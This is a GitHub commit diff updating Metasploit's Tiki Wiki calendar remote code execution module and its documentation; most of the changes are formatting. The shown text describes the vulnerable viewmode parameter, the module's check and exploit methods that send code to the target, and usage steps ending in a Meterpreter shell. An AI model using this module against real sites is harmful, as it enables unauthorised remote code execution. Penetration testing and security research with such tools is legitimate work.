Skip to content

Commit 8697d3d

Browse files
committed
Update tiki_calendar_exec module and documentation
1 parent 9cb57d7 commit 8697d3d

File tree

2 files changed

+26
-15
lines changed

2 files changed

+26
-15
lines changed

documentation/modules/exploit/linux/http/tiki_calendar_exec.md

Lines changed: 15 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,20 +1,19 @@
11
## Vulnerable Application
22

3-
Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
4-
Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
5-
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
3+
* Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
4+
* Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
5+
* Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
6+
7+
**Of note, there is some discussion if 14.2 is vuln or not.**
68

7-
Of note, there is some discussion if 14.2 is vuln or not.
8-
```
99
1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
1010
2. The linked app Exploit-DB has is 14.2.
1111
3. Its verified on Exploit-DB.
12-
```
12+
1313
vs
14-
```
14+
1515
1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
1616
2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem
17-
```
1817

1918
### Creating A Testing Environment
2019

@@ -29,7 +28,8 @@ vs
2928

3029
#### Permissions
3130

32-
If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar
31+
If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:
32+
3333
1. Log in as admin
3434
2. From the top dropdown select permissions
3535
3. Check Anonymous near the top
@@ -45,13 +45,16 @@ vs
4545
6. Do: `set payload php/bind_perl`
4646
7. Do: `set verbose true`
4747
8. Do: `check`
48+
4849
```
4950
[*] Attempting Login
5051
[+] Login Successful!
5152
[+] 10.10.10.10:80 The target is vulnerable.
5253
```
53-
8. Do: `exploit`
54-
9. You should get a shell
54+
55+
9. Do: `exploit`
56+
10. You should get a shell
57+
5558
```
5659
[*] Started reverse TCP handler on 10.10.10.10:4444
5760
[*] Attempting Login
@@ -60,6 +63,7 @@ vs
6063
[*] Sending stage (33721 bytes) 10.10.10.10.190
6164
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
6265
```
66+
6367
## Options
6468

6569
**PASSWORD**

modules/exploits/linux/http/tiki_calendar_exec.rb

Lines changed: 11 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -6,9 +6,11 @@
66
require 'msf/core'
77

88
class MetasploitModule < Msf::Exploit::Remote
9-
include Msf::Exploit::Remote::HttpClient
109

1110
Rank = ExcellentRanking
11+
12+
include Msf::Exploit::Remote::HttpClient
13+
1214
def initialize(info = {})
1315
super(
1416
update_info(
@@ -17,9 +19,10 @@ def initialize(info = {})
1719
'Description' => %q(
1820
Tiki-Wiki CMS's calendar module contains a remote code execution
1921
vulnerability within the viewmode GET parameter.
20-
The calendar module is NOT enabled by default. When enbled,
22+
The calendar module is NOT enabled by default. If enabled,
2123
the default permissions are set to NOT allow anonymous users
2224
to access.
25+
2326
Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14
2427
Verified/Tested against 14.1
2528
),
@@ -118,10 +121,12 @@ def check
118121
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
119122
cookie = authenticate
120123
end
124+
121125
flag = Rex::Text.rand_text_alpha(10)
122126
res = send_calendar_packet(cookie, "print(#{flag})")
127+
123128
if res
124-
if res.body =~ /You do not have permission to view the calendar/
129+
if res.body =~ /You do not have permission to view the calendar/i
125130
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
126131
elsif res.body =~ />#{flag}</
127132
Exploit::CheckCode::Vulnerable
@@ -135,10 +140,12 @@ def exploit
135140
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
136141
cookie = authenticate
137142
end
143+
138144
vprint_status('Sending malicious calendar view packet')
139145
res = send_calendar_packet(cookie, payload.encoded)
140-
if res && res.body =~ /You do not have permission to view the calendar/
146+
if res && res.body =~ /You do not have permission to view the calendar/i
141147
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
142148
end
143149
end
150+
144151
end

0 commit comments

Comments
 (0)